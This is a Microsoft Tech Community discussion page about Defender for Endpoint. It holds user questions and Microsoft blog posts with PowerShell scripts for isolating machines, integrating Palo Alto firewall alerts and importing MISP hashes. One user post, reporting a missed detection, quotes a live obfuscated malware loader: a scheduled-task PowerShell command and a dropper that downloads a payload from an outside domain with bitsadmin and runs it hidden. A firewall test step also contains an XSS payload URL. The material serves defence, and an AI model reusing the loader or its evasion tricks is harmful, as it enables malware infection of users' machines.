Recent Discussions
How to Create a Custom Slack Alert for Windows Defender ATP using Microsoft Flow in 5 minutes
The MVP WDATP API Hackathon ended 2h ago and the first outcome is blogged. If you like the following blog, please credit the author with a "like" here in the Tech Community. https://azurementor.wordpress.com/2019/03/22/how-to-create-a-custom-slack-alert-for-windows-defender-advanced-threat-protection-atp-using-microsoft-flow-in-5-minutes/
Solved | 7.1K Views | 23 likes | 2 Comments

Automate response with Defender ATP and Microsoft Flow
Another cool product of the MVP Summit Hackathon by Stefan Schörling. The step-by-step blog will guide you through automating responses with the MDATP Flow connector. Don't forget to show your love: use the like button here and share your feedback in this conversation. http://blog.sec-labs.com/2019/04/automate-response-with-defender-atp-and-microsoft-flow/
3.5K Views | 19 likes | 0 Comments

YARA rule support
Hi everybody, I'm curious if Microsoft is planning to support YARA rules. I think that this will become even more important in the future. I found this very old thread from 2019, where this question was asked by other folks: IS MS looking to support custom YARA rules for Windows Defender ATP - Microsoft Tech Community. Unfortunately, it looks like nothing has happened so far. Best regards, Stefan
12K Views | 14 likes | 1 Comment

[MDE] Add the important feature, Yara rules if possible
Hi, refer to this advisory (first link). In addition, you can see that there are Yara rules from GitHub (inside the pdf) (2nd link). All EDR/XDR companies (except Microsoft) already have features and a Yara rule configuration for the incident responders to detect with. The method of adding and detecting with Yara rules has been in practice across companies for many years. Would you mind advising on any reason for not adding the important feature, Yara rules? It would be good if you included the important feature, Yara rules. If not, would you mind advising on converting Yara rules to MDE queries for querying via advanced threat hunting? Thanks, much appreciated. 🙂
https://www.csa.gov.sg/singcert/Advisories/ad-2021-007
This link is the Yara rule: https://github.com/Neo23x0/signature-base/blob/master/yara/apt_cobaltstrike.yar
https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/yara-rule-support/m-p/2276820
21K Views | 11 likes | 7 Comments

MUST be able to delete duplicate/orphaned devices from M365 Security Center
Good morning, I am about 2-3 weeks into evaluating Microsoft Defender for Endpoint, and so far have about 4 Windows 10 devices onboarded and managed through Intune policies. One of the test machines was a fairly fresh build (1903) of Windows 10 when it was onboarded. As such it generated over 900+ vulnerabilities in TVM. However, during the course of the next day or two, as it got itself patched all the way to 20H2, it then for some reason generated a duplicate device in the M365 portal - with exactly the same Device AAD id - and currently both the "old" and "new" devices are showing as Active 5 days later.

So first of all, it is a nightmare that the duplicate device was created in the first place with the same Device AAD id - so what happens when one of my customers' networks gets upgraded with 500 Windows 10 devices from version X to 20H2 - are there going to be 500 duplicate devices created??? I read lots of articles yesterday about people seeing this issue as far back as 2018, where they just need to be able to lance out a given machine or machines for whatever reason from the database to keep everything tidy. I spent hours looking for a solution. We have a 180 day Retention period set. I'm not waiting 6 months for my database to clean itself up due to a bug in the platform, you've got to be kidding! Given that this has happened after only onboarding 4 devices, it's not leaving a good taste in my mouth. And how do I explain this to my customers????

The real problem however is the severe impact this has on the TVM reporting. As I mentioned, the machine patched itself without issue all the way to 20H2; as such all 900+ vulnerabilities have been addressed - like literally *all* of them. However, when I look at any Dashboard in Threat & Vulnerability Management the stats are all completely skewed due to this device's statistics still being accounted for.

Given the VALUE of the TVM data, which I think is BRILLIANT - to have the CONTEXT skewed due to this duplicate device bug, but most importantly the lack of basic functionality to remove an orphaned machine to tidy things up, is completely unacceptable. As the Administrator of my own estate (and my customers' estates) I should be able to have the final say in terms of a judgement call on what devices should be listed in the portal. Waiting for a device to be Inactive for 6 months to have its clean-up routine run by the platform automatically isn't acceptable. The Offboarding script workaround I've been reading about isn't going to cut it either, so please don't suggest it. I tried it using the API explorer method and running the local Offboarding script on said machine yesterday. Neither method worked, as both devices 18 hours later are still showing in the portal. This method also doesn't account for machines that (for whatever reason) will not be able to contact the portal to check in and receive the Offboarding command (lost device, test device, corrupt device, BYOD - the list goes on).

So...... Microsoft - please, please, please, please - can we get a Delete button in the device actions menu so that we can clean up our estate and keep our TVM figures accurate - otherwise, what is the point of any of the statistics and recommendations displayed if you can't act/have already acted on them?? So when senior management ask, "What's our posture?", the answer would unfortunately still be, "Dunno." Thank you.
Solved | 34K Views | 11 likes | 18 Comments

Automate Windows Defender ATP response action: Machine isolation
5 Minutes | Low complexity

Response teams rely on powerful actions that allow them to take immediate action when a threat is identified. Being able to automate those response actions is a powerful way to enhance a SecOps team's workflow. In this blog, we're going to demonstrate how you can automate the machine isolation response action.

In our previous blogs we've demonstrated how you can:
- Set up an app and create a script to get WDATP's alerts (Hello World blog). This is a good reference for when you need to create a new app.
- Grant more permissions, and get and update alerts as part of a ticketing/SIEM/SOAR integration (Ticketing System Integration blog). This is a good source of information to learn how to add more permissions to apps.

For response teams, a typical use case involves the ability to enrich SIEM or SOAR playbooks with Windows Defender ATP's powerful remediation capabilities. Just imagine how powerful it can be to detect malicious activity using your firewall or IPS and isolate the suspicious machine wherever it is (even if the machine is off network at the time of response). In this blog, we'll walk you through using the machine isolation API. This response action leaves the machine disconnected from any network connection other than the Windows Defender ATP channel (allowing Windows Defender ATP to undo the isolation). What's great about this demonstration is that it can be applied to the other response actions documented here.

Let's start

In this section, we'll walk you through the following:
Step 1: Add the required permission to your application
Step 2: Isolate a machine by machine ID or machine name

Step 1 - Add the required permission to the application:

If you haven't created an app: Create an app using the instructions described in the Hello World blog.
Then follow the instructions on how to add the isolation permission as described below.
If you've already created an app that you're going to reuse for this demonstration: Add the "Isolate Machine" permission as described below.
We recommend that you follow the detailed steps as described in "Step 1 - Add the required permission to the application" in the Alert Update API blog.

Add Isolation Permission
1. Open the Azure portal.
2. Navigate to Azure Active Directory > App registrations.
3. Under All Apps, find and select the application, for example ContosoSIEMConnector.
4. Navigate to Settings > Required permissions > Enable Access.
5. Select the checkbox for the Isolate machine application permission.
6. Click Save and Grant Permissions.
Done! You have successfully added the required permissions to the application.

Step 2 - Isolate a machine by machine ID or machine name:

Save the following script file as IsolateMachine.ps1 in the same folder where you saved the Hello World example (where Get-Token.ps1 was saved).

IsolateMachine.ps1

    param (
        [Parameter(Mandatory=$true)][string]$comment,                    # any comment that helps
        [Parameter(Mandatory=$true)][string]$machineIdOrComputerDnsName, # the machineID or ComputerDnsName
        [Parameter(Mandatory=$true)]
        [ValidateSet('Full','Selective')]                                # validate that the input is a valid isolation type
        [string]$isolationType                                           # the type of machine isolation
    )

    $token = ./Get-Token.ps1   # execute Get-Token.ps1 to get the authorization token
    $url = "https://api.securitycenter.windows.com/api/machines/$machineIdOrComputerDnsName/Isolate"

    $body = @{
        "Comment"       = $comment
        "IsolationType" = $isolationType
    }
    $headers = @{
        'Content-Type' = 'application/json'
        Accept         = 'application/json'
        Authorization  = "Bearer $token"
    }

    $response = Invoke-WebRequest -Method Post -Uri $url -Body ($body | ConvertTo-Json) -Headers $headers -ErrorAction Stop

    if ($response.StatusCode -eq 201) {   # the Isolate API answers 201 Created when the request is accepted
        return $true    # isolation request accepted
    } else {
        return $false   # isolation request failed
    }
Example 1: Isolate by machine DNS name
Find the machine FQDN in the machine page (concatenate the machine name and the domain). For example, to isolate the machine testMachine.contoso.com use the following command:

    .\IsolateMachine.ps1 -machineIdOrComputerDnsName testMachine.contoso.com -comment "isolate because of alert" -isolationType Full

Example 2: Isolate by using machine ID
Find the machine ID in the URL of the machine page. For example, to isolate the machine whose machine page URL is https://securitycenter.windows.com/_machine/1f2258dc516c7bf8ec62466e2e876774c0a984f3 use the following command:

    .\IsolateMachine.ps1 -machineIdOrComputerDnsName 1f2258dc516c7bf8ec62466e2e876774c0a984f3 -comment "isolate because of alert" -isolationType Full

Example 3: Isolate machines with severe alerts
Read high severity alerts as described in the previous blogs, then use the machine ID found in each alert to isolate the machine using the following script.

GetSevereAlertsAndIsolate.ps1

    # Returns alerts created in the past hour and isolates machines with high severity alerts
    $token = .\Get-Token.ps1
    $dateTime = (Get-Date).ToUniversalTime().AddHours(-1).ToString("o")

    # create the URL with a filter for date and severity
    $url = "https://api.securitycenter.windows.com/api/alerts?`$filter=alertCreationTime ge $dateTime and severity eq 'High'"
    $headers = @{
        'Content-Type' = 'application/json'
        Accept         = 'application/json'
        Authorization  = "Bearer $token"
    }
    $response = Invoke-RestMethod -Method Get -Uri $url -Headers $headers -ErrorAction Stop

    # for each alert, get the machineId and alertId and isolate the machine, writing the alert ID in the isolation comment
    foreach ($alert in $response.value) {
        $machineId = $alert.machineId
        $alertId   = $alert.id
        $url  = "https://api.securitycenter.windows.com/api/machines/$machineId/Isolate"
        $body = @{
            Comment       = "Isolate machine because alert - $alertId"
            IsolationType = "Full"   # required by the Isolate API (Full or Selective)
        }
        $headers = @{
            'Content-Type' = 'application/json'
            Accept         = 'application/json'
            Authorization  = "Bearer $token"
        }
        $isolateResponse = Invoke-WebRequest -Method Post -Uri $url -Body ($body | ConvertTo-Json) -Headers $headers -ErrorAction Stop

        # check the isolation request status code and write to the log file
        if ($isolateResponse.StatusCode -eq 201) {
            Add-Content c:\temp\api\log.txt "The isolation of machine $machineId ended successfully"
        } else {
            Add-Content c:\temp\api\log.txt "Failed to isolate machine $machineId"
        }
    }

Example 4: Release machine (un-isolate)
Save the script below as UnIsolateMachine.ps1 in the same folder where you saved the Hello World example (where Get-Token.ps1 was saved).

UnIsolateMachine.ps1

    param (
        [Parameter(Mandatory=$true)][string]$comment,
        [Parameter(Mandatory=$true)][string]$machineId
    )

    $token = ./Get-Token.ps1
    $url = "https://api.securitycenter.windows.com/api/machines/$machineId/UnIsolate"
    $body = @{
        Comment = $comment
    }
    $headers = @{
        'Content-Type' = 'application/json'
        Accept         = 'application/json'
        Authorization  = "Bearer $token"
    }
    $response = Invoke-WebRequest -Method Post -Uri $url -Body ($body | ConvertTo-Json) -Headers $headers -ErrorAction Stop
    return ($response.Content | ConvertFrom-Json)

Use the following command in the same way to release the machine from isolation:

    .\UnIsolateMachine.ps1 -machineId 1f2258dc516c7bf8ec62466e2e876774c0a984f3 -comment "un-isolate - machine was found clean"

Conclusion:
In this blog we demonstrated how you can easily automate Windows Defender ATP response actions. There are more actions you can automate, such as running an antivirus scan and restricting app execution. For more information, see the other actions here. Let us know if you are interested in more specific remediation examples.
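The scripts above report success as soon as the isolation request is accepted (HTTP 201). Because isolation is carried out by the sensor on the machine, the request is queued and completed later, and it stays pending while the machine is offline, so a SOAR playbook usually also needs to know whether the action actually finished. The script below is an added example, not code from the original blog: it submits the isolation through the same API and then follows the machine action object the API returns until it reaches a final state. It assumes Get-Token.ps1 from the Hello World blog in the same folder and a file name of Invoke-IsolationAndTrack.ps1 (my choice); the machineactions endpoint and the status values come from the machine action API documentation linked elsewhere on this page.

```powershell
# Invoke-IsolationAndTrack.ps1 (added example; not part of the original blog)
# Isolates a machine and follows the resulting machine action to completion.
# Assumptions: Get-Token.ps1 from the Hello World blog sits in the same folder and
# returns a bearer token; the app registration has the "Isolate machine" permission.

param (
    [Parameter(Mandatory=$true)][string]$machineId,   # machine ID from the machine page URL
    [Parameter(Mandatory=$true)][string]$comment,     # reason recorded with the action
    [ValidateSet('Full','Selective')][string]$isolationType = 'Full',
    [int]$timeoutSeconds = 300                        # how long to wait for the action to settle
)

$baseUrl = "https://api.securitycenter.windows.com/api"
$token   = ./Get-Token.ps1
$headers = @{
    'Content-Type' = 'application/json'
    Accept         = 'application/json'
    Authorization  = "Bearer $token"
}

function Invoke-MdatpApi {
    # Thin wrapper so that the error body the API returns (for instance when the machine
    # already has an action in progress) is surfaced instead of a bare exception.
    param([string]$Method, [string]$Uri, [hashtable]$Body)
    try {
        if ($Body) {
            return Invoke-RestMethod -Method $Method -Uri $Uri -Headers $headers -Body ($Body | ConvertTo-Json) -ErrorAction Stop
        }
        return Invoke-RestMethod -Method $Method -Uri $Uri -Headers $headers -ErrorAction Stop
    } catch {
        throw "MDATP API $Method $Uri failed: $($_.Exception.Message) $($_.ErrorDetails.Message)"
    }
}

# 1. Submit the isolation request. The response body is a MachineAction object whose id
#    lets us track the request after the HTTP call has returned.
$action = Invoke-MdatpApi -Method Post -Uri "$baseUrl/machines/$machineId/isolate" -Body @{
    Comment       = $comment
    IsolationType = $isolationType
}
Write-Host "Submitted isolation action $($action.id) (status: $($action.status))"

# 2. Poll the action until it leaves Pending/InProgress or the timeout expires.
#    Only 'Succeeded' means the machine is actually isolated.
$deadline = (Get-Date).AddSeconds($timeoutSeconds)
while (($action.status -in @('Pending','InProgress')) -and ((Get-Date) -lt $deadline)) {
    Start-Sleep -Seconds 10
    $action = Invoke-MdatpApi -Method Get -Uri "$baseUrl/machineactions/$($action.id)"
}

# 3. Return a compact record for the SOAR or ticketing step that called this script.
[pscustomobject]@{
    MachineId     = $machineId
    ActionId      = $action.id
    IsolationType = $isolationType
    Status        = $action.status   # Pending | InProgress | Succeeded | Failed | Cancelled
    Isolated      = ($action.status -eq 'Succeeded')
}
```

Run it as .\Invoke-IsolationAndTrack.ps1 -machineId 1f2258dc516c7bf8ec62466e2e876774c0a984f3 -comment "isolate because of alert". A Status of Pending after the timeout is not a failure: the machine has not checked in yet and the action will complete when it does, so the caller should keep the ActionId and re-check it rather than resubmit.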
In the next blog we'll demonstrate the integration of alerts from other detection sources. Thanks!
@Haim Goldshtein, security software engineer, Windows Defender ATP
@Dan Michelson, program manager, Windows Defender ATP
32K Views | 8 likes | 5 Comments

WDATP alert/incident assignment
Hello, when I look at an alert on the console, I'm able to perform an action that assigns it to myself. I would like to also be able to assign it to others in my organization (we have a team of people who respond to WDATP alerts). Is there any option to do that?
1.7K Views | 7 likes | 4 Comments

False positive: Suspicious PowEmotet behavior was blocked
Based on social media posts, it seems quite a few of us are experiencing numerous false positive alerts related to 'PowEmotet'. While it's understandable that false positives happen, it's also somewhat amazing this one made it through QA. But this also highlights some things that I find extremely frustrating about Defender for Endpoint. There does not seem to be a reliable way to deal with these at a tenant level, aside from setting the status to "false positive" and potentially adding a file hash of a related executable to Indicators and hoping it goes away. Is there anything I'm missing here? Also, where is Microsoft acknowledging this issue? Where should I go for up-to-the-minute updates on occurrences like this?
6.6K Views | 7 likes | 0 Comments

Malware not detected (but it should)
Some days ago a colleague received an email (O365 ATP protected) and clicked the link inside. The link caused a zip file to be downloaded; the zip contained 2 files, a shortcut and an xml file. The shortcut actually created a scheduled task:

    %windir%\System32\schtasks.exe /F /Create /sc minute /MO 15 /TN "AI" /ST 05:43 /TR "cmd /c power%os:~6,1%hell -eP bypAss -win 1 -c '&{cd %public:~-15,9%\;$k=dir -r -force -in riepi*.*|select -last 1;$k=cat -LiteralPath $k;%os:~1,1%ex $k[$k.length-1]}'"

So a cmd was started and then a powershell command to parse the content of the zip file; the zip file contained the string below (to install the malware). Now the malware is correctly detected, but a week ago it wasn't; the reason for concern is that Defender ATP SHOULD have detected a suspicious activity: a zip was downloaded, the lnk file when double-clicked created a task, the task launched a cmd, the cmd launched a powershell and the powershell went through the file system to get the original zip and install the malware. I'm wondering why no suspicious activity was detected.

I also wonder why there is no way to interact with MSFT support in such a case if you don't have a support plan; the evidence is that I'm facing a product issue.

The string contained at the end of the zip file:

    $IPgHSp9NqFwlyUdz9EiUaC=$env:HOMEDRIVE+$env:HOMEPATH+'\AppData\Roaming'; start-process -wiNdowStylE HiDden schtasks '/change /tn AI /disable'; $1ky8EqL4xuTNcMdlzE160A0 = (Get-WmiObject Win32_ComputerSystemProduct).UUID; $d9aSs4246nDe2406Bu0oGMC=$1ky8EqL4xuTNcMdlzE160A0.Substring(0,6); $2mg4sgEtuOEmhIplOMZ3O34 = $IPgHSp9NqFwlyUdz9EiUaC+'\'+$d9aSs4246nDe2406Bu0oGMC;If(test-path $2mg4sgEtuOEmhIplOMZ3O34"\_in"){$gZ6ZH3E1bBYDLsCi90GNDKJzl = (Get-Date).AddMinutes(-20);$gwbsm1Im8I4bn6mZ40KwC3GD=Get-ChildItem -Path $2mg4sgEtuOEmhIplOMZ3O34"\_in" | Where-Object {$_.LastWriteTime -gt $gZ6ZH3E1bBYDLsCi90GNDKJzl };if ($gwbsm1Im8I4bn6mZ40KwC3GD){exit;}}; New-Item -ItemType Directory -Force -Path $2mg4sgEtuOEmhIplOMZ3O34;$rr="`$namKgJJlKuRmxyZh=""$2mg4sgEtuOEmhIplOMZ3O34\sbr_init.ps1"";`$clpsr='/C bitsadmin /transfer JuhtdQPu /download /priority FOREGROUND ""https://mrscremeansclassroom.com/kfldcncjfvdwer/sdcmgfkbfg"" ""'+`$namKgJJlKuRmxyZh+'""'; start-process -wiNdowStylE HiDden cmd.exe `$clpsr;`$e=1;while(`$e -eq 1){If(test-path `$namKgJJlKuRmxyZh){`$e=3;}Start-Sleep -s 3;};`$clpsr='/C powershell -win hidden -ep bypass -File '+`$namKgJJlKuRmxyZh;start-process -wiNdowStylE HiDden cmd.exe `$clpsr;";$rr | out-file $2mg4sgEtuOEmhIplOMZ3O34'\KG1PNqifExGVCbhCkcxwnc.ps1';$VEzW3fIGi5Wmyd12HPG46o=' /F /create /sc minute /mo 5 /TN "AppRunLog" /ST 03:30 /TR "powershell.exe -ep bypass -win 1 -file '+$2mg4sgEtuOEmhIplOMZ3O34+'\KG1PNqifExGVCbhCkcxwnc.ps1 "'; start-process -wiNdowStylE HiDden schtasks $VEzW3fIGi5Wmyd12HPG46o;
4.9K Views | 6 likes | 4 Comments

MS Defender - Installation Error version 101.25072 on macOS
Dear experts, the latest version of MS Defender can't be installed. I'm getting an error message since the release date (5th Aug). I have tried restarting the computer and tested with different networks; same issue 🙁
Solved | 4.4K Views | 6 likes | 22 Comments

Palo Alto Networks and WDATP ad-hoc integration
Integrate your Palo Alto Networks firewall alerts directly into the WDATP machine timeline and alert queue

5 Minutes | Low complexity

Firewall and IPS/IDS are common tools in every organization's security toolbox. While those tools can proficiently detect suspicious connections to command and control servers (C2 servers) from a client machine, actionable alerts that pinpoint the process which created the connection are not surfaced for security teams to investigate and respond to. In this blog we'll demonstrate how to integrate Palo Alto Networks Next-Gen Firewall alerts with Windows Defender ATP to leverage the power of their detections to identify actionable alerts.

Palo Alto Networks Next-Gen Firewall has an API which allows Palo Alto's customers to get alerts from the alert logs of both the firewall and the WildFire sandbox. You can choose to use the API to get information from a specific firewall appliance, or use the same API with Palo Alto Networks Panorama, which allows you to get the alerts from all of your Palo Alto Networks Next-Gen Firewall and WildFire appliances. You can get the full documentation of the Palo Alto Networks API here.

Let's start

It is only 3 simple steps that will get you the desired integration:
Step 1: Settings in Palo Alto Networks Next-Gen Firewall
- Read-only API role creation
- User creation and role assignment
- Update the sample script
Step 2: Windows Defender ATP settings
- Add API permissions
Step 3: Test runs
- WildFire alert
- Firewall alert

Step 1 - Settings in Palo Alto Networks Next-Gen Firewall:

To get the alerts from Palo Alto Networks Next-Gen Firewall we first need to create a user on the firewall with the required permissions:
1. Open the Palo Alto Networks Next-Gen Firewall administration console.
2. Log in as a privileged user.
3. Go to Device > Admin Role > Add.
4. Give a name to the role and remove all the permissions on all tabs except the "Log" permission under the XML-API tab, then click OK.
5. Go to Device > Administrators > Add.
6. Enter a name and a password, choose "Role Based" in the administrator type settings and in the profile field choose the role we created.
7. Important!!! Click Commit in the upper right corner.
Done! You have successfully added a user with the required permissions.

Note: since many organizations leave the firewall with the default self-signed certificate, I've added a bypass in the script (published by PoshKazun on GitHub). If your firewall is set up with a trusted certificate you can change the "trustSelfSignCertificate" parameter to false.

Download the PowerShell script attached to this blog, save it in the same folder where you saved the Get-Token.ps1 script from the Hello World blog, and modify the "#### required information from step 1 #####" section. A typical section may look like:

    $firewallURL = "https://TheUrlToYourFirewallMgmtConsole"
    $username = "theNewUserWeCreated"
    $password = "NewUserPassword"
    $alertQueryTimeframe = 30
    $minimumAlertSeverity = "medium"

Done! You have successfully completed the required steps to use the Palo Alto Networks API.

Step 2: Settings in Windows Defender ATP

In this step, we will add the required permissions to Windows Defender ATP. We will add the permissions to the application we set up in the Hello World blog. If you didn't set up an application yet, you need to follow the Hello World blog's 3 short steps to create one. First, we need to add the permissions "Run advanced queries" and "Read and write all alerts":
1. Open the Azure portal.
2. Navigate to Azure Active Directory > App registrations.
3. Under All Apps, find and select the application, for example, ContosoSIEMConnector.
4. Navigate to Settings > Required permissions > Enable Access.
5. Select the checkboxes for the "Run advanced queries" and "Read and write all alerts" application permissions.
6. Click Save and Grant Permissions.
Done! You have successfully added the required permissions to Windows Defender ATP.

Step 3: Test runs

WildFire Alert
Download the Palo Alto Networks WildFire test file and create an alert in the WDATP portal:
1. Open your browser and navigate to https://wildfire.paloaltonetworks.com/publicapi/test/pe
2. Wait 5-10 minutes and run the PowerShell script.

Firewall Alert
Create a fake suspicious network connection and create an alert in the WDATP portal:
1. Open your browser and navigate to https://testing.com/book.html?default=<script>alert(XSS test)</script>
2. Wait 5 minutes and run the PowerShell script.
Note: if your firewall policy action for vulnerabilities is set to "Reset-both", then the firewall will reset the connection before it starts. In that case, you will not find network connection telemetry in the WDATP portal.

Now open the WDATP portal and look for the alerts. You should find the Palo Alto Networks firewall alert and the Palo Alto Networks WildFire alert in the WDATP alert queue, and in the machine timeline.

Recommendations:
We recommend scheduling the integration script to run every 20 minutes with alertQueryTimeframe set to 30 minutes to allow overlap.

Conclusion:
While network protection solutions catch the threats at the network bottleneck, they still miss the context and the ability to remediate the endpoint. The combination of Palo Alto Networks firewall and WDATP creates a unique better-together value from detection to remediation. In future blogs we'll show you how to force AutoIR to automatically remediate the root of the threat. You can follow these steps to create Windows Defender ATP alerts from other security/SOAR/SIEM solutions. Let us know if you are interested in integrating alerts from other sources. Thanks!
@Haim Goldshtein, security software engineer, Windows Defender ATP
@Dan Michelson, program manager, Windows Defender ATP
@Ben Alfasi, software engineer, Windows Defender ATP
20K Views | 6 likes | 13 Comments

Microsoft Defender API - Live Response Session Logging
Hello, are there any plans to expose the Live Response session data via the API? The data I'd be particularly interested in would be: command logs, who created the session, when the session started, and the duration of the session. We currently track incident investigation in a third party tool; if an analyst was required to open a Live Response session as part of remediation efforts, we'd ideally like to pull all resulting command logs into that ticket. This would also be great for longer term reporting and auditing purposes, e.g. pulling ALL Live Response session data into a log aggregation platform like ELK/QRadar/Splunk etc. I think it would be a great addition to the other machine actions that are exposed here: https://docs.microsoft.com/en-gb/windows/security/threat-protection/microsoft-defender-atp/machineaction
Property: type
Description: Type of the action. Possible values are: "RunAntiVirusScan", "Offboard", "CollectInvestigationPackage", "Isolate", "Unisolate", "StopAndQuarantineFile", "RestrictCodeExecution" and "UnrestrictCodeExecution"
4.8K Views | 5 likes | 4 Comments

Microsoft Defender ATP and Malware Information Sharing Platform integration
Pull file hashes (SHA1) from Malware Information Sharing Platform (MISP) and push them to Microsoft Defender ATP

5 Minutes | Low complexity

Enterprises use threat intelligence to enrich their cyber security telemetry as well as to detect and block attacks. Microsoft Defender ATP supports blocking capabilities through the portal using the indicators page and the indicators API. In a previous blog, we explained how to use the indicators API in general. In our commitment to listen to customer feedback, we're going to demonstrate how to leverage the power of Malware Information Sharing Platform (MISP) to further augment the protection offering of Microsoft Defender ATP.

MISP is a free and open source threat sharing platform. It is designed to help share threat intelligence information such as cyber security indicators, vulnerability information, and others. In this blog, we will demonstrate an easy way to automatically pull the indicators from the MISP platform and push them into the custom IoC list of Microsoft Defender ATP. We'll guide you on how to pull SHA1 hashes from the past four days from MISP, and push them as indicators for Microsoft Defender ATP to detect. We'll push the indicators with an expiration date set to seven days from the time the script is run to ensure the freshness of the indicators.

Let's start
1. Add the required permission to write indicators to Microsoft Defender ATP
2. Get your MISP URL and Authorization key
3. Download and use the script, which uses the MISP API to pull SHA1 hashes from your MISP platform and push them into Microsoft Defender ATP

Step 1: Add permission to write indicators to Microsoft Defender ATP

NOTE: This step is identical to the process detailed in our previous blog. If you've already done it, skip this step.
If you haven't created an app: Create an app using the instructions described in the Hello World blog, then follow the instructions on how to add TI write permissions as described below.
If you've already created an app that you're going to reuse for this demonstration: Add the "TI.ReadWrite.All" permission as described below.
We recommend that you follow the detailed steps as described in "Step 1 - Add the required permission to the application" in the Alert Update API blog.

Add TI write permissions
1. Open the Azure portal.
2. Navigate to Azure Active Directory > App registrations.
3. Under All Applications, find and select the application, for example, ContosoSIEMConnector.
4. Click API permissions > Add a permission.
5. Click on "APIs my organization uses" and type WindowsDefenderATP in the search box. Then choose the "WindowsDefenderATP" API from the list.
6. Click on the "Application permissions" button and check the "TI.ReadWrite.All" checkbox.
7. Click Add Permission.
8. On the "API Permissions" screen, click on the "Grant admin consent for..." button.
Done! You have successfully added the required permissions to the application.

Step 2: Get your MISP URL and Authorization key

To use the MISP API, you will need your MISP URL and authorization key. You can get the URL from the MISP web interface and the API key from the Automation section of the MISP web interface. See below:

Step 3: Run the script

Download the zip file at the bottom of this blog and extract the "Get-MISP-Hash.ps1" script. Make sure the script is in the same directory (folder) as your "Get-Token.ps1" script. Now let's run the script! Let's say your MISP URL is 10.0.0.1 and the key is Yn81mP1ck13Ric4. Open PowerShell and run the following command:

    .\Get-MISP-Hash.ps1 -title "Sha1 from MISP" -mispUrl "10.0.0.1" -authKey "Yn81mP1ck13Ric4"

And that's it, you are done! You can see the new hashes in your Microsoft Defender Security Portal by clicking on Settings, then looking for "Indicators" in the menu on the left of the screen.
The script also offers additional (optional) parameters you may want to use to control the indicators and how MDATP handles them:

    Parameter                       Description                                                              Default value
    -title                          The alert's title                                                        -
    -mispUrl                        Your MISP URL from the MISP platform                                     -
    -authKey                        Your MISP authorization key                                              -
    -action (optional)              Choose one: Alert/AlertAndBlock/Allowed                                  Alert
    -severity (optional)            Choose one: Informational/Low/Medium/High                                Informational
    -description (optional)         The alert's description                                                  -
    -recommendedAction (optional)   The recommended action to remediate the alert                            -
    -expiration (optional)          Number of days after which the hashes expire and are deleted from MDATP  7

Another example that utilizes all of the options is shown below, all on the same line:

    .\Get-MISP-Hash.ps1 -title "Sha1 from MISP" -mispUrl "10.0.0.1" -authKey "Yn81mP1ck13Ric4" -action AlertAndBlock -severity High -description "Sha1 from the MISP platform loaded by automated script" -recommendedActions "Add your own recommended actions" -expiration 14

Conclusion
In this blog, we demonstrated how you can pull SHA1 hashes from MISP to augment the Microsoft Defender ATP protection capabilities.

FAQs:
Which file hashes are supported?
This integration supports SHA1. MISP's API only supports SHA1 and MD5 (which is relatively weak), while Microsoft Defender ATP supports SHA1 and SHA256. Also note that "Only published events and attributes marked as IDS Signature are exported" (MISP API documentation).

How do I modify the MISP filter?
The MISP API we used to get the hashes has some filtering options. We set the script to get hashes from the past 4 days:

    https://<your_MISP_URL>/events/hids/sha1/download/false/false/false/4d

You can change it to any other number of days or hours; you can also filter by start and end date or by MISP tags you've set up. For the full details, see MISP's API docs here: https://www.circl.lu/doc/misp/automation/ and look for the "GET /events/hids Hash" section.
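The blog's own Get-MISP-Hash.ps1 ships in the attached zip and is not reproduced on this page. The script below is an added example, not the blog's code, that implements the same flow end to end: it pulls SHA1 hashes from the MISP hids export URL shown above, keeps only well-formed 40-hex-digit values, and submits each one to the Microsoft Defender ATP indicators API with the expiration computed from -expiration, the way the blog describes. It assumes Get-Token.ps1 from the Hello World blog in the same folder and an app registration holding TI.ReadWrite.All; the file name Push-MispSha1.ps1, the default description text and the -lookback parameter are my own additions.

```powershell
# Push-MispSha1.ps1 (added example; not the blog's Get-MISP-Hash.ps1)
# Pull SHA1 hashes from MISP's hids export and submit each one as a Microsoft
# Defender ATP indicator with an expiration date.
# Assumptions: Get-Token.ps1 from the Hello World blog is in the same folder; the
# app registration has TI.ReadWrite.All; the MISP automation key is passed in -authKey.

param (
    [Parameter(Mandatory=$true)][string]$mispUrl,   # e.g. 10.0.0.1 (host only, no scheme)
    [Parameter(Mandatory=$true)][string]$authKey,   # MISP automation key
    [string]$title = "Sha1 from MISP",
    [ValidateSet('Alert','AlertAndBlock','Allowed')][string]$action = 'Alert',
    [ValidateSet('Informational','Low','Medium','High')][string]$severity = 'Informational',
    [string]$description = "SHA1 indicator imported from MISP",
    [string]$recommendedActions = "",
    [string]$lookback = "4d",                       # MISP 'last' filter: 4d, 12h, ...
    [int]$expiration = 7                            # days until MDATP drops the indicator
)

# 1. Pull the hashes. The hids export returns one hash per line plus comment lines,
#    so keep only well-formed SHA1 values and drop duplicates.
$mispHeaders = @{ Authorization = $authKey; Accept = 'text/plain' }
$raw = Invoke-RestMethod -Method Get -Uri "https://$mispUrl/events/hids/sha1/download/false/false/false/$lookback" -Headers $mispHeaders -ErrorAction Stop
$hashes = @([string]$raw -split "`r?`n" |
    ForEach-Object { $_.Trim().ToLower() } |
    Where-Object { $_ -match '^[0-9a-f]{40}$' } |
    Select-Object -Unique)
Write-Host "MISP returned $($hashes.Count) SHA1 hashes from the last $lookback"

# 2. Submit each hash to MDATP. expirationTime is ISO 8601 in UTC and is computed
#    once, so every indicator from this run expires together.
$token = ./Get-Token.ps1
$mdatpHeaders = @{
    'Content-Type' = 'application/json'
    Accept         = 'application/json'
    Authorization  = "Bearer $token"
}
$expiresAt = (Get-Date).ToUniversalTime().AddDays($expiration).ToString("o")
$summary = @{ Submitted = 0; Skipped = 0 }

foreach ($sha1 in $hashes) {
    $body = @{
        indicatorValue     = $sha1
        indicatorType      = 'FileSha1'
        action             = $action
        title              = $title
        severity           = $severity
        description        = $description
        recommendedActions = $recommendedActions
        expirationTime     = $expiresAt
    }
    try {
        $null = Invoke-RestMethod -Method Post -Uri "https://api.securitycenter.windows.com/api/indicators" -Headers $mdatpHeaders -Body ($body | ConvertTo-Json) -ErrorAction Stop
        $summary.Submitted++
    } catch {
        # An indicator that already exists with a different action is not overwritten
        # by the API; report the hash and continue with the rest of the batch.
        Write-Warning "Skipped $sha1 : $($_.Exception.Message) $($_.ErrorDetails.Message)"
        $summary.Skipped++
    }
}
[pscustomobject]$summary
```

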